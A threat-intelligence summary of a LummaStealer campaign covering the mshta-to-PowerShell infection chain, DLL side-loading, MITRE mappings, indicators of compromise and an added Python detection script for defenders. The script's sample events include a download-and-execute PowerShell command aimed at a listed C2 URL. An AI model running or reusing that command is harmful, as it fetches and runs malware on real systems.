LummaStealer: More Tricks, More Trouble – Part 2

In February 2025 the RevEng.AI team identified a new LummaStealer campaign whose TTPs differ from those of the previously documented ones. The infection chain starts with a legacy Visual Basic Script run through mshta.exe and then uses PowerShell to decode and execute commands fetched from a remote endpoint, ultimately delivering a stealer that targets stored passwords and cryptocurrency wallets. The chain runs silently, but it is identifiable by its contact with known C2 domains and by the control-flow obfuscation used to hinder analysis. Affected: LummaStealer malware; Windows systems; phishing campaigns; users of VirtualBox.

Key points:

  • RevEngAI team observed a LummaStealer campaign in February 2025.
  • LummaStealer is designed to steal sensitive information, including passwords and cryptocurrency wallets.
  • The malware employs distinct tactics compared to the previously analyzed ClickFix campaign.
  • The infection chain starts with a Visual Basic Script executed via the MSHTA utility (mshta.exe).
  • PowerShell is then used to decode and execute commands retrieved from a remote endpoint.
  • The binaries involved, including Update.exe and its companion DLLs, reference those DLLs by fixed name, so a malicious DLL placed alongside the executable is loaded in place of the legitimate one (DLL side-loading).
  • Obfuscation techniques complicate malware analysis through control flow manipulation.
  • Identified C2 domains indicate ongoing communication and data exfiltration potential.
  • RevEng.AI facilitates tracking and analysis of malware similarities and variations.

MITRE Techniques:

  • Command and Scripting Interpreter: Visual Basic (T1059.005): a Visual Basic Script is used in the initial stage of the infection chain.
  • Command and Scripting Interpreter: PowerShell (T1059.001): PowerShell decodes and executes the commands downloaded from the malicious endpoint.
  • OS Credential Dumping: LSASS Memory (T1003.001) is the technique listed for the stealer's harvesting of passwords and cryptocurrency wallets; note that this ID denotes dumping LSASS process memory, whereas harvesting credentials saved by browsers and wallet applications corresponds more closely to Credentials from Password Stores (T1555).
  • Hijack Execution Flow: DLL Search Order Hijacking (T1574.001): Update.exe references VBoxRT.dll and VBoxVMM.dll by fixed name, so a malicious copy dropped next to the executable is loaded in place of the legitimate VirtualBox library.
  • Obfuscated Files or Information (T1027): LummaStealer's control flow is obfuscated to evade detection and complicate analysis.

Indicators of Compromise:

  • Domain: guiacui.com[.]br
  • URL: guiacui.com[.]br/wp-content/plugins/goodlayers-core-portfolio/languages/es[.]txt
  • Domain: minlliving[.]biz
  • Domain: guardeduppe[.]com
  • SHA-256: 366bd0e69838b03d40352962e46e8b2eedf5f467d01a0a9f073056dc51a5b3e0 (LummaStealer binary)
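The following is an added detection example written for this summary; it is not code from the RevEng.AI post or from the campaign. It runs three checks over constructed Sysmon-style process-creation (EventID 1) and image-load (EventID 7) events: PowerShell spawned by mshta.exe, an encoded PowerShell command whose decoded content references one of the C2 domains listed above, and Update.exe loading VBoxRT.dll or VBoxVMM.dll from outside the VirtualBox install directory. Assumptions not stated on the page: the remote command is passed via PowerShell's -EncodedCommand (base64 of UTF-16LE), the legitimate VirtualBox directory is the default C:\Program Files\Oracle\VirtualBox, and the field names follow Sysmon's schema. The sample events, file paths and stage-2 command are constructed.

```python
import base64
import json
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Refanged copies of the C2 domains from the IoC list above.
C2_DOMAINS = {"guiacui.com.br", "minlliving.biz", "guardeduppe.com"}

# Assumption: default VirtualBox install directory; DLLs loaded from anywhere
# else by Update.exe are treated as side-loaded.
LEGIT_VBOX_DIR = PureWindowsPath(r"C:\Program Files\Oracle\VirtualBox")
SIDELOADED_DLLS = {"vboxrt.dll", "vboxvmm.dll"}

# Assumption: the remote command arrives via -EncodedCommand (any of the
# unambiguous short forms PowerShell accepts), i.e. base64 of UTF-16LE.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HOST_RE = re.compile(r"(?i)https?://([a-z0-9.-]+)")


def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> List[str]:
    """Return detection labels for one Sysmon-style event (empty list = clean)."""
    hits: List[str] = []
    if ev.get("EventID") == 1:  # ProcessCreate
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        if parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe"):
            hits.append("mshta->powershell")
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded:
            hits.append("encoded-command")
            for host in HOST_RE.findall(decoded):
                if host.lower() in C2_DOMAINS:
                    hits.append(f"c2-domain:{host.lower()}")
    elif ev.get("EventID") == 7:  # ImageLoad
        loaded = ev.get("ImageLoaded", "")
        if basename(ev.get("Image", "")) == "update.exe" and basename(loaded) in SIDELOADED_DLLS:
            if not PureWindowsPath(loaded).is_relative_to(LEGIT_VBOX_DIR):
                hits.append(f"sideload:{basename(loaded)}")
    return hits


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Return {event index: labels} for every event that triggered a detection."""
    return {i: hits for i, ev in enumerate(events) if (hits := check_event(ev))}


# Constructed sample telemetry, not real log lines from the campaign.
STAGE2_URL = ("https://guiacui.com.br/wp-content/plugins/"
              "goodlayers-core-portfolio/languages/es.txt")
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Users\victim\AppData\Local\Temp\launch.hta"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_ps(f"IEX (New-Object Net.WebClient).DownloadString('{STAGE2_URL}')")},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # benign
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Local\Temp\Update.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\VBoxRT.dll"},
    {"EventID": 7, "Image": r"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe",
     "ImageLoaded": r"C:\Program Files\Oracle\VirtualBox\VBoxRT.dll"},  # benign
]

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

The encoded-command check deliberately decodes before matching, since the C2 hostname never appears in clear text on the PowerShell command line; the benign `-ExecutionPolicy Bypass` invocation is included to show that the `-e` prefix matching does not misfire on other switches.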

Full Story: https://blog.reveng.ai/lummastealer-more-tricks-more-trouble-part-2/